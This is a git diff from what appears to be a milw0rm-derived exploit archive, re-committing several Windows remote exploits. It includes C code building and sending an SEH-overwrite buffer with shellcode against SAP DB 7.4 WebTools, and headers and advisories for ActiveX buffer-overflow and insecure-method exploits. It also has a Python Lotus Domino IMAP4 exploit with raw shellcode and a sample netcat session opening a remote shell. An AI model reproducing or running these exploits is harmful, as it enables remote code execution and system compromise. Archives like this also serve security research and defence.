WSAStartup(MAKEWORD(2,0), &wsa); + if(argc<2) + { + usage(argv[0]); + return -1; + } + + // set defaults + port=9999; + itarget=-1; + sh=0; + // ------------ + + while((c = getopt(argc, argv, "h:p:t:"))!= EOF) + { + switch (c) + { + case 'h': + remotehost=optarg; + break; + case 't': + sscanf(optarg, "%d", &itarget); + itarget--; + break; + case 'p': + sscanf(optarg, "%d", &port); + break; + default: + usage(argv[0]); + WSACleanup(); + return -1; + } + } + if(remotehost == NULL) remotehost=default_remotehost; + memset(temp1,0,sizeof(temp1)); + memset(temp2,0,sizeof(temp2)); + memset(temp1, '\x20' , 58 - strlen(remotehost) -1); + printf(" # Host : %s%s# \n", remotehost, temp1); + sprintf(temp2, "%d", port); + memset(temp1,0,sizeof(temp1)); + memset(temp1, '\x20' , 58 - strlen(temp2) -1); + printf(" # Port : %s%s# \n", temp2, temp1); + memset(temp1,0,sizeof(temp1)); + memset(temp2,0,sizeof(temp2)); + sprintf(temp2, "%s", shellcodes[sh].name ); + memset(temp1, '\x20' , 58 - strlen(temp2) -1); + printf(" # Payload : %s%s# \n", temp2, temp1); + if(itarget!=-1) + { + 
memset(temp1,0,sizeof(temp1)); + memset(temp1, '\x20' , 58 - strlen(targets[itarget].t) -1); + printf(" # Target : %s%s# \n", targets[itarget].t, temp1); + }else + { + memset(temp1,0,sizeof(temp1)); + memset(temp1, '\x20' , 58 - strlen("Please select target") -1); + printf(" # Target : %s%s# \n", "Please select target", temp1); + } + printf(" # ------------------------------------------------------------------- # \n"); + fflush(stdout); + printf(" [+] Checking if server is online\n"); + fflush(stdout); + s=do_connect(remotehost, port); + if(s==-1) + { + printf(" [-] Server is OFFLINE\n"); + end_logo(); + return 0; + } + closesocket(s); + printf(" [+] Server is ONLINE\n"); + + + unsigned char buf[30000]; + memset(buf,0,sizeof(buf)); + fflush(stdout); + + make_buffer(buf, itarget, sh); + printf(" [+] Attacking buffer constructed\n"); + if(send_buffer(buf, remotehost,port)==-1) + { + printf(" [-] Cannot exploit server %s\n", remotehost); + end_logo(); + WSACleanup(); + return -1; + } + + printf(" [+] Buffer sent\n"); + printf(" [+] Connect to %s:%d\n", remotehost, 4444); + end_logo(); + WSACleanup(); + return 0; +} + + + +SOCKET do_connect (char *remotehost, int port) +{ + static struct hostent *host; + static struct sockaddr_in addr; + SOCKET s; + host = gethostbyname(remotehost); + if (!host) + { + perror("[-] gethostbyname() failed"); + return -1; + } + addr.sin_addr = *(struct in_addr*)host->h_addr; + + s = socket(PF_INET, SOCK_STREAM, 0); + if (s == -1) + { + closesocket(s); + perror("socket() failed"); + return -1; + } + + addr.sin_port = htons(port); + addr.sin_family = AF_INET; + + if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1) + { + closesocket(s); + return -1; + } + + return s; +} + + +void prepare_shellcode(unsigned char * fsh, unsigned int * fshlength, int sh) +{ + memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length); + *fshlength = shellcodes[sh].length; +} + +void make_buffer(unsigned char * buf, int itarget, int sh) +{ + // prepare 
shellcode + unsigned char fsh[10000]; + unsigned int fshlength; + memset(fsh, 0, sizeof(fsh)); + prepare_shellcode(fsh, &fshlength, sh); + // ----------------- + + // make buffer + unsigned char * cp=buf; + + // HTTP request + memcpy(cp, "GET /webdbm?Event=DBM_INTERN_TEST&Action=REFRESH&HTTP_COOKIE=", strlen("GET /webdbm?Event=DBM_INTERN_TEST&Action=REFRESH&HTTP_COOKIE=")); + cp +=strlen((char *)cp); + + // long request + memset(cp, 'A', 20774); + cp +=strlen((char *)cp); + + // jmp over 6 bytes + *cp++ = '\x90'; + *cp++ = '\x90'; + *cp++ = '\xEB'; + *cp++ = '\x06'; + + + // SEH handler + *cp++ = (char)((targets[itarget].ret ) & 0xff); + *cp++ = (char)((targets[itarget].ret >> 8) & 0xff); + *cp++ = (char)((targets[itarget].ret >> 16) & 0xff); + *cp++ = (char)((targets[itarget].ret >> 24) & 0xff); + + // jff + *cp++ = '\x90'; + *cp++ = '\x90'; + *cp++ = '\x90'; + *cp++ = '\x90'; + + // copy shellcode + memcpy(cp, fsh, fshlength); + cp+=fshlength; + + // end of HTTP request + memcpy(cp, " HTTP/1.0\r\n\r\n", strlen(" HTTP/1.0\r\n\r\n")); + cp +=strlen((char *)cp); + // ----------------- +} + + + +int send_buffer(unsigned char * buf, char * remotehost, int port) +{ + SOCKET sock; + int bytes; + + sock = do_connect(remotehost, port); + if(sock==-1) printf(" [-] Failed to connect to server\n"); + bytes = send(sock, (char *)buf, (int)strlen((char *)buf), 0); + if (bytes<0) printf(" [-] Failed to send the buffer\n"); else printf(" [+] Sent %d bytes\n", bytes); + closesocket(sock); + return 1; +} + + +// ----------------------------------------------------------------- +// XGetopt.cpp Version 1.2 +// ----------------------------------------------------------------- +int getopt(int argc, char *argv[], char *optstring) +{ + static char *next = NULL; + if (optind == 0) + next = NULL; + + optarg = NULL; + + if (next == NULL || *next == '\0') + { + if (optind == 0) + optind++; + + if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0') + { + optarg = NULL; + if 
(optind < argc) + optarg = argv[optind]; + return EOF; + } + + if (strcmp(argv[optind], "--") == 0) + { + optind++; + optarg = NULL; + if (optind < argc) + optarg = argv[optind]; + return EOF; + } + + next = argv[optind]; + next++; // skip past - + optind++; + } + + char c = *next++; + char *cp = strchr(optstring, c); + + if (cp == NULL || c == ':') + return '?'; + + cp++; + if (*cp == ':') + { + if (*next != '\0') + { + optarg = next; + next = NULL; + } + else if (optind < argc) + { + optarg = argv[optind]; + optind++; + } + else + { + return '?'; + } + } + + return c; +} +// ----------------------------------------------------------------- +// ----------------------------------------------------------------- +// ----------------------------------------------------------------- + + +void usage(char * s) +{ + printf(" Usage : %s -h -p -t \n", s); + printf(" Arguments:\n"); + printf(" -h host to connect\n"); + printf(" -p port (default: 9999)\n"); + printf(" -t target to attack\n"); + printf(" Shellcodes:\n"); + for(int i=0; shellcodes[i].name!=0;i++) + { + printf(" %d. %s\n",i+1,shellcodes[i].name); + } + printf("\n"); + printf(" Targets:\n"); + for(int j=0; targets[j].t!=0;j++) + { + printf(" %d. 
%s\n",j+1,targets[j].t); + } + printf("\n"); + end_logo(); +} + +void logo() +{ + printf("\n\n"); + printf(" ####################################################################### \n"); + printf(" # ____ __ _ ______ __ _____ #\n"); + printf(" # / __ \\________ _____/ /_(_)_________ / __/\\ \\/ / / _ / #\n"); + printf(" # / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___ / / \\ / / // / #\n"); + printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \\ / ___/ #\n"); + printf(" # /_____/_/ \\___/ \\_,_/\\__/_/\\___/\\__,_/ /_/ /_/\\_\\/_/ #\n"); + printf(" # crew #\n"); + printf(" ####################################################################### \n"); + printf(" # Exploit : SAP DB 7.4 WebTools Remote SEH overwrite exploit # \n"); + printf(" # Author : Heretic2 (heretic2x@gmail.com # \n"); + printf(" # Research: NGSSoftware Insight Security Research # \n"); + printf(" # Version : 1.0 Public Release # \n"); + printf(" # System : Windows 2000 ALL SP # \n"); + printf(" # Date : 07.07.2007 # \n"); + printf(" # ------------------------------------------------------------------- # \n"); +} + +void end_logo() +{ + printf(" # ------------------------------------------------------------------- # \n"); + printf(" # Dreatica-FXP crew [Heretic2] # \n"); + printf(" ####################################################################### \n\n"); +} + +// milw0rm.com [2007-07-07] diff --git a/platforms/windows/remote/4158.html b/platforms/windows/remote/4158.html index ffd78b96f..a4218333d 100755 --- a/platforms/windows/remote/4158.html +++ b/platforms/windows/remote/4158.html @@ -1,129 +1,129 @@ - - - - - - NeoTracePro 3.25 ActiveX Control "TraceTarget()" b0f [NeoTraceExplorer.dll] Remote 0-day Exploit - - - - -
    - - - - /**** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE ****/

    - NeoTracePro 3.25 ActiveX Control "TraceTarget()" b0f [NeoTraceExplorer.dll] Remote 0-day Exploit
    - by nitr0us
    - www.genexx.org/nitrous/

    - - - - -
    - - - -# milw0rm.com [2007-07-07] + + + + + + NeoTracePro 3.25 ActiveX Control "TraceTarget()" b0f [NeoTraceExplorer.dll] Remote 0-day Exploit + + + + +
    + + + + /**** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE ****/

    + NeoTracePro 3.25 ActiveX Control "TraceTarget()" b0f [NeoTraceExplorer.dll] Remote 0-day Exploit
    + by nitr0us
    + www.genexx.org/nitrous/

    + + + + +
    + + + +# milw0rm.com [2007-07-07] diff --git a/platforms/windows/remote/4160.html b/platforms/windows/remote/4160.html index c895a7c12..5aae0ace1 100755 --- a/platforms/windows/remote/4160.html +++ b/platforms/windows/remote/4160.html @@ -1,38 +1,38 @@ -
    -------------------------------------------------------------------------------
    - Chilkat Software Chilkat Zip ActiveX Component (ChilkatZip2.dll v. 12.4.2.0)
    - "SaveLastError()" and "WriteExe()" Insecure Methods
    - 
    - url: http://www.chilkatsoft.com/
    -
    - author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    - 
    - This was written for educational purpose. Use it at your own risk.
    - Author will be not be responsible for any damage.
    - 
    - THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
    - IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
    -
    - This control is marked as:
    - RegKey Safe for Script: False
    - RegKey Safe for Init: False
    - Implements IObjectSafety: True
    - IDisp Safe: Safe for untrusted: caller, data
    - IPersist Safe: Safe for untrusted: caller, data
    - IPStorage Safe: Safe for untrusted: caller, data
    - KillBitSet: Falso
    -
    - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    -------------------------------------------------------------------------------
    -
    -
    -
    -
    -
    - -# milw0rm.com [2007-07-07] +
    +------------------------------------------------------------------------------
    + Chilkat Software Chilkat Zip ActiveX Component (ChilkatZip2.dll v. 12.4.2.0)
    + "SaveLastError()" and "WriteExe()" Insecure Methods
    + 
    + url: http://www.chilkatsoft.com/
    +
    + author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    + 
    + This was written for educational purpose. Use it at your own risk.
    + Author will be not be responsible for any damage.
    + 
    + THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
    + IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
    +
    + This control is marked as:
    + RegKey Safe for Script: False
    + RegKey Safe for Init: False
    + Implements IObjectSafety: True
    + IDisp Safe: Safe for untrusted: caller, data
    + IPersist Safe: Safe for untrusted: caller, data
    + IPStorage Safe: Safe for untrusted: caller, data
    + KillBitSet: Falso
    +
    + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    +------------------------------------------------------------------------------
    +
    +
    +
    +
    +
    + +# milw0rm.com [2007-07-07] diff --git a/platforms/windows/remote/4170.html b/platforms/windows/remote/4170.html index cac448f07..921874723 100755 --- a/platforms/windows/remote/4170.html +++ b/platforms/windows/remote/4170.html 
@@ -1,119 +1,119 @@ -:. GOODFELLAS Security Research TEAM .: -:. http://goodfellas.shellcode.com.ar .: - -sasatl.dll 1.5.0.531 Program Checker - Javascript Heap Spraying Exploit -======================================================================== - -Internal ID: VULWAR200706280. - - -Introduction ------------- -sasatl.dll is a library included in the Program Checker Pro software package from the Zenturi. http://www.programchecker.com - - -Tested In ---------- -- Windows XP SP1/SP2 english/french with IE 6.0 / 7.0. -- Windows vista Professional English/French SP1 with IE 7.0 - - -Summary -------- -The Fill method is prone to a stack-based buffer-overflow vulnerability because it fails to properly check boundaries. - - -Impact ------- -An attacker could execute arbitrary code into the remote machine. - - -Workaround ----------- -- Activate the Kill bit zero in clsid:7D6B5B29-FC7E-11D1-9288-00104B885781. -- Unregister sasatl.dll using regsvr32. - - -Timeline --------- -July 10, 2007 -- Exploit published. - - -Credits -------- - * callAX - * GoodFellas Security Research Team - -Proof of Concept ----------------- - - - - - - - - - - -# milw0rm.com [2007-07-10] +:. GOODFELLAS Security Research TEAM .: +:. http://goodfellas.shellcode.com.ar .: + +sasatl.dll 1.5.0.531 Program Checker - Javascript Heap Spraying Exploit +======================================================================== + +Internal ID: VULWAR200706280. + + +Introduction +------------ +sasatl.dll is a library included in the Program Checker Pro software package from the Zenturi. http://www.programchecker.com + + +Tested In +--------- +- Windows XP SP1/SP2 english/french with IE 6.0 / 7.0. +- Windows vista Professional English/French SP1 with IE 7.0 + + +Summary +------- +The Fill method is prone to a stack-based buffer-overflow vulnerability because it fails to properly check boundaries. + + +Impact +------ +An attacker could execute arbitrary code into the remote machine. 
+ + +Workaround +---------- +- Activate the Kill bit zero in clsid:7D6B5B29-FC7E-11D1-9288-00104B885781. +- Unregister sasatl.dll using regsvr32. + + +Timeline +-------- +July 10, 2007 -- Exploit published. + + +Credits +------- + * callAX + * GoodFellas Security Research Team + +Proof of Concept +---------------- + + + + + + + + + + +# milw0rm.com [2007-07-10] diff --git a/platforms/windows/remote/4176.html b/platforms/windows/remote/4176.html index a66354a24..25f5126cd 100755 --- a/platforms/windows/remote/4176.html +++ b/platforms/windows/remote/4176.html 
@@ -1,77 +1,77 @@ -:. GOODFELLAS Security Research TEAM .: -:. http://goodfellas.shellcode.com.ar .: - -PGPBBox.dll 5.1.0.112 SecureBlackbox Arbitary Data Write Exploit. -================================================================ - -Test in patched XP SP2 IE 6.0/7.0 and Vista IE 7.0 -================================================== - -Internal ID: VULWAR200707121. - -Introduction ------------- -PGPBBox.dll is a library included in the SecureBlackbox -software package from the Eldos Company http://www.eldos.com/ - -Tested In ---------- -- Windows XP SP2 english/french with IE 6.0 / 7.0. -- Windows vista Professional English/French SP1 with IE 7.0 - -Summary -------- -The SaveToFile method doesn't check if it's is being called from the application, -or malicious users. Remote Attacker could craft a html page and write arbitrary -data. - -Impact ------- -Any computer that uses this Sofware will be exposed to Data Write Arbitrary. - -Workaround ----------- -- Activate the Kill bit zero in clsid: C22BB435-9B7F-4B1F-ACBD-CD36D34D6DFF. -- Unregister PGPBBox.dll using regsvr32. - - -Timeline --------- -July 12, 2007 -- Bug discovery. -July 12, 2007 -- Bug published. - - -Credits -------- - * callAX - - - -Technical Details ------------------ - -SaveToFile method receives one argument filename in this format "c:\path\file". - - -Proof of Concept ----------------- - - - - - - - - - - -# milw0rm.com [2007-07-12] +:. GOODFELLAS Security Research TEAM .: +:. http://goodfellas.shellcode.com.ar .: + +PGPBBox.dll 5.1.0.112 SecureBlackbox Arbitary Data Write Exploit. +================================================================ + +Test in patched XP SP2 IE 6.0/7.0 and Vista IE 7.0 +================================================== + +Internal ID: VULWAR200707121. 
+ +Introduction +------------ +PGPBBox.dll is a library included in the SecureBlackbox +software package from the Eldos Company http://www.eldos.com/ + +Tested In +--------- +- Windows XP SP2 english/french with IE 6.0 / 7.0. +- Windows vista Professional English/French SP1 with IE 7.0 + +Summary +------- +The SaveToFile method doesn't check if it's is being called from the application, +or malicious users. Remote Attacker could craft a html page and write arbitrary +data. + +Impact +------ +Any computer that uses this Sofware will be exposed to Data Write Arbitrary. + +Workaround +---------- +- Activate the Kill bit zero in clsid: C22BB435-9B7F-4B1F-ACBD-CD36D34D6DFF. +- Unregister PGPBBox.dll using regsvr32. + + +Timeline +-------- +July 12, 2007 -- Bug discovery. +July 12, 2007 -- Bug published. + + +Credits +------- + * callAX + + + +Technical Details +----------------- + +SaveToFile method receives one argument filename in this format "c:\path\file". + + +Proof of Concept +---------------- + + + + + + + + + + +# milw0rm.com [2007-07-12] diff --git a/platforms/windows/remote/4177.html b/platforms/windows/remote/4177.html index 247624d4a..87d3ff3b0 100755 --- a/platforms/windows/remote/4177.html +++ b/platforms/windows/remote/4177.html 
@@ -1,143 +1,143 @@ -:. GOODFELLAS Security Research TEAM .: -:. http://goodfellas.shellcode.com.ar .: - -sasatl.dll 1.5.0.531 Program Checker-Method DebugMsgLog Heap Spraying Exploit -============================================================================= - -Internal ID: VULWAR200707121. - -Introduction ------------- -sasatl.dll is a library included in the Program Checker Pro software package from the Company Zenturi. http://www.programchecker.com - - -Tested In ---------- -- Windows XP SP1/SP2 english/french with IE 6.0 / 7.0. -- Windows vista Professional English/French SP1 with IE 7.0 - - -Summary -------- -The DebugMsgLog method is prone to a stack-based buffer-overflow vulnerability, because it fails to properly check boundaries. - - -Impact ------- -An attacker could execute arbitrary code into the remote machine. - - -Workaround ----------- -- Activate the Kill bit zero in clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F51. -- Unregister sasatl.dll using regsvr32. - - -Timeline --------- -July 12 2007 -- Exploit published. - - -Credits -------- - * Vulnerability Discovered by Will Dormann CERT/CC. 
- * Exploit by callAX from GoodFellas Security Research Team - -Technical Details ------------------ - -.text:100340F3 sub_100340F3 proc near ; DATA XREF: .rdata:100ACA6Co -.text:100340F3 ; .rdata:100AFC1Cto -.text:100340F3 mov eax, offset sub_1009D47C -.text:100340F8 call __EH_prolog -.text:100340FD push dword ptr [ebp+0Ch] ; wchar_t * -.text:10034100 lea ecx, [ebp+0Ch] -.text:10034103 call sub_1005DC32 -.text:10034108 push dword ptr [ebp+0Ch] ; char -.text:1003410B and dword ptr [ebp-4], 0 -.text:1003410F push offset aCnixonconfig_4 ; "\r\n~CNixonConfigMgrEx::DebugMsgLog %s" -.text:10034114 push 1 ; int -.text:10034116 call sub_10003099 -.text:1003411B or dword ptr [ebp-4], 0FFFFFFFFh -.text:1003411F add esp, 0Ch -.text:10034122 lea ecx, [ebp+0Ch] -.text:10034125 call sub_1005DB6B -.text:1003412A mov ecx, [ebp-0Ch] -.text:1003412D xor eax, eax -.text:1003412F mov large fs:0, ecx -.text:10034136 leave -.text:10034137 retn 8 - -Proof of Concept ----------------- - - - - -

    Will Dormann from CERT/CC is credited with the discovery.


    -

    This exploits executes calc.exe

    - - - - - -# milw0rm.com [2007-07-12] +:. GOODFELLAS Security Research TEAM .: +:. http://goodfellas.shellcode.com.ar .: + +sasatl.dll 1.5.0.531 Program Checker-Method DebugMsgLog Heap Spraying Exploit +============================================================================= + +Internal ID: VULWAR200707121. + +Introduction +------------ +sasatl.dll is a library included in the Program Checker Pro software package from the Company Zenturi. http://www.programchecker.com + + +Tested In +--------- +- Windows XP SP1/SP2 english/french with IE 6.0 / 7.0. +- Windows vista Professional English/French SP1 with IE 7.0 + + +Summary +------- +The DebugMsgLog method is prone to a stack-based buffer-overflow vulnerability, because it fails to properly check boundaries. + + +Impact +------ +An attacker could execute arbitrary code into the remote machine. + + +Workaround +---------- +- Activate the Kill bit zero in clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F51. +- Unregister sasatl.dll using regsvr32. + + +Timeline +-------- +July 12 2007 -- Exploit published. + + +Credits +------- + * Vulnerability Discovered by Will Dormann CERT/CC. 
+ * Exploit by callAX from GoodFellas Security Research Team + +Technical Details +----------------- + +.text:100340F3 sub_100340F3 proc near ; DATA XREF: .rdata:100ACA6Co +.text:100340F3 ; .rdata:100AFC1Cto +.text:100340F3 mov eax, offset sub_1009D47C +.text:100340F8 call __EH_prolog +.text:100340FD push dword ptr [ebp+0Ch] ; wchar_t * +.text:10034100 lea ecx, [ebp+0Ch] +.text:10034103 call sub_1005DC32 +.text:10034108 push dword ptr [ebp+0Ch] ; char +.text:1003410B and dword ptr [ebp-4], 0 +.text:1003410F push offset aCnixonconfig_4 ; "\r\n~CNixonConfigMgrEx::DebugMsgLog %s" +.text:10034114 push 1 ; int +.text:10034116 call sub_10003099 +.text:1003411B or dword ptr [ebp-4], 0FFFFFFFFh +.text:1003411F add esp, 0Ch +.text:10034122 lea ecx, [ebp+0Ch] +.text:10034125 call sub_1005DB6B +.text:1003412A mov ecx, [ebp-0Ch] +.text:1003412D xor eax, eax +.text:1003412F mov large fs:0, ecx +.text:10034136 leave +.text:10034137 retn 8 + +Proof of Concept +---------------- + + + + +

    Will Dormann from CERT/CC is credited with the discovery.


    +

    This exploits executes calc.exe

    + + + + + +# milw0rm.com [2007-07-12] diff --git a/platforms/windows/remote/4190.html b/platforms/windows/remote/4190.html index 14801ce78..00b1bde8e 100755 --- a/platforms/windows/remote/4190.html +++ b/platforms/windows/remote/4190.html @@ -1,57 +1,57 @@ -
    ----------------------------------------------------------------------------------------
    - Data Dynamics ActiveBar ActiveX Control (actbar3.ocx <= 3.1) Multiple Inscure Methods
    - url: http://www.datadynamics.com/default.aspx
    -
    - author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    - 
    - This was written for educational purpose. Use it at your own risk.
    - Author will be not be responsible for any damage.
    - 
    - THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
    - IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
    -
    - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    - all software that use this ocx are vulnerable to this exploits.
    -
    - This control is marked as:
    - RegKey Safe for Script: True
    - RegKey Safe for Init: True
    - Implements IObjectSafety: False
    - KillBitSet: False
    ----------------------------------------------------------------------------------------
    -
    -
    -
    -
    -
    -
    -
    -
    -
    -
    -
    - -# milw0rm.com [2007-07-17] +
    +---------------------------------------------------------------------------------------
    + Data Dynamics ActiveBar ActiveX Control (actbar3.ocx <= 3.1) Multiple Inscure Methods
    + url: http://www.datadynamics.com/default.aspx
    +
    + author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    + 
    + This was written for educational purpose. Use it at your own risk.
    + Author will be not be responsible for any damage.
    + 
    + THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
    + IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
    +
    + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    + all software that use this ocx are vulnerable to this exploits.
    +
    + This control is marked as:
    + RegKey Safe for Script: True
    + RegKey Safe for Init: True
    + Implements IObjectSafety: False
    + KillBitSet: False
    +---------------------------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    + +# milw0rm.com [2007-07-17] diff --git a/platforms/windows/remote/42.c b/platforms/windows/remote/42.c index 50d7bd7b9..bc4e9d10e 100755 --- a/platforms/windows/remote/42.c +++ b/platforms/windows/remote/42.c @@ -186,6 +186,6 @@ D:\>type "c:\Program Files\Magic Winmail\server\logs\smtp.log" 0x25783020 0x2078382e 0x2e257830 */ - - -// milw0rm.com [2003-06-11] + + +// milw0rm.com [2003-06-11] diff --git a/platforms/windows/remote/4200.html b/platforms/windows/remote/4200.html index 59e5d248c..5d00ea63f 100755 --- a/platforms/windows/remote/4200.html +++ b/platforms/windows/remote/4200.html @@ -1,78 +1,78 @@ -
    ------------------------------------------------------------------------------------
    - Versalsoft HTTP File Uploader (UFileUploaderD.dll v. 6.0.0.38) "AddFile()" method
    - Remote Buffer Overflow Ecploit (Heap Spray Technique)
    - url: http://en.versalsoft.com/
    - price: from $59.95 to $799.95
    -
    - author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    -
    - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    - This exploits executes calc.exe
    ------------------------------------------------------------------------------------
    -
    -
    -
    -
    -
    -
    -
    -
    - -# milw0rm.com [2007-07-19] +
    +-----------------------------------------------------------------------------------
    + Versalsoft HTTP File Uploader (UFileUploaderD.dll v. 6.0.0.38) "AddFile()" method
    + Remote Buffer Overflow Ecploit (Heap Spray Technique)
    + url: http://en.versalsoft.com/
    + price: from $59.95 to $799.95
    +
    + author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    +
    + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    + This exploits executes calc.exe
    +-----------------------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    +
    + +# milw0rm.com [2007-07-19] diff --git a/platforms/windows/remote/4207.py b/platforms/windows/remote/4207.py index 6bafbe771..c04910e1a 100755 --- a/platforms/windows/remote/4207.py +++ b/platforms/windows/remote/4207.py 
@@ -1,175 +1,175 @@ -########################################################################################### -# Lotus Domino IMAP4 Server Release 6.5.4 / Windows 2000 Advanced Server x86 Remote Exploit -########################################################################################### -# Vulnerable: IBM Lotus Domino <= 7.0.2 && 6.5.5 FP2 (tested 6.5.4) -# Authors: Dominic Chell & prdelka -# -# Exploitation steps: -# 1) The instruction "call dword [ecx]" is performed with user supplied ECX -# 2) EAX reference our buffer from retaddr onward -# 3) we put pointer in ECX to a pointer referencing "call eax" -# 4) a small payload decrements eax and then jmp's into the eax buffer due -# to size limitations. -# 5) our larger payload is then executed. -# -# muts exploit would not work for us, his egghunt uses 0x2e which is converted -# to 0x09 (.'s to [tab]'s) and his return address was not found on our test -# environment. -# -# Finding a Target: -# To find a target, attach a debugger to nimap.exe, cause the application -# to crash. Then use search function to find "call eax" or equivilant -# instruction in memory. Then, take the pointer to eax, such as "0x77ff1122" -# and search for another location in memory that has "0x11 0xff 0x77". This -# will be utilised for a return address if no instruction modify eax or -# subvert execution to another place in memory. -# -# Thanks to: nemo, hdm, jf, Winny Thomas, muts -# -########################################################################################### -# Note: it takes a few minutes for the egghunter to find the payload in memory -# -# For example: -# C:\work\exploits\imap>poc.py -# [*] sending payload -# [*] sending payload -# [*] sending payload -# [*] sending payload -# * OK Domino IMAP4 Server Release 6.5.4 ready Tue, 26 Jun 2007 15:18:36 +0100 -# -# PDAwNEU5QkNCLjgwMjU3MzA2LjAwMDAwOUY4LjAwMDAwMDA5QERNQz4= -# -# sending... 
-# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ -# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ -# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ -# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkNvS2XQk9FgpybEKu3E1If4xWBcDWBeDmcnDC2rgYnVG+2Q3 -# BG5572VAQQov6VasmyGZmqi4dlFEk/x9Zwv0gcDrZXeQkJCD6FKD6FKD6FL/4CB4OcnLXAvHq421 -# M2iR5FFG -# -# -# C:\work\exploits\imap>nc -vv 192.168.126.130 4444 -# 2KVM-DC [192.168.126.130] 4444 (?) open -# Microsoft Windows 2000 [Version 5.00.2195] -# (C) Copyright 1985-1999 Microsoft Corp. -# -# E:\Lotus\Domino> -# -########################################################################################### - -import socket, struct, md5, base64, sys, string, signal, getopt - - -class Exp_Lotus: - def __init__(self): - self.host='127.0.0.1' - self.port=143 - - -def send_payload(host,port): - payload ="\x54\x30\x30\x57\x54\x30\x30\x57" - payload += ("\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf7" - "\x82\xf8\x80\x83\xeb\xfc\xe2\xf4\x0b\xe8\x13\xcd\x1f\x7b\x07\x7f" - "\x08\xe2\x73\xec\xd3\xa6\x73\xc5\xcb\x09\x84\x85\x8f\x83\x17\x0b" - "\xb8\x9a\x73\xdf\xd7\x83\x13\xc9\x7c\xb6\x73\x81\x19\xb3\x38\x19" - "\x5b\x06\x38\xf4\xf0\x43\x32\x8d\xf6\x40\x13\x74\xcc\xd6\xdc\xa8" - "\x82\x67\x73\xdf\xd3\x83\x13\xe6\x7c\x8e\xb3\x0b\xa8\x9e\xf9\x6b" - "\xf4\xae\x73\x09\x9b\xa6\xe4\xe1\x34\xb3\x23\xe4\x7c\xc1\xc8\x0b" - "\xb7\x8e\x73\xf0\xeb\x2f\x73\xc0\xff\xdc\x90\x0e\xb9\x8c\x14\xd0" - "\x08\x54\x9e\xd3\x91\xea\xcb\xb2\x9f\xf5\x8b\xb2\xa8\xd6\x07\x50" - "\x9f\x49\x15\x7c\xcc\xd2\x07\x56\xa8\x0b\x1d\xe6\x76\x6f\xf0\x82" - "\xa2\xe8\xfa\x7f\x27\xea\x21\x89\x02\x2f\xaf\x7f\x21\xd1\xab\xd3" - "\xa4\xd1\xbb\xd3\xb4\xd1\x07\x50\x91\xea\xe9\xdc\x91\xd1\x71\x61" - "\x62\xea\x5c\x9a\x87\x45\xaf\x7f\x21\xe8\xe8\xd1\xa2\x7d\x28\xe8" - "\x53\x2f\xd6\x69\xa0\x7d\x2e\xd3\xa2\x7d\x28\xe8\x12\xcb\x7e\xc9" - "\xa0\x7d\x2e\xd0\xa3\xd6\xad\x7f\x27\x11\x90\x67\x8e\x44\x81\xd7" 
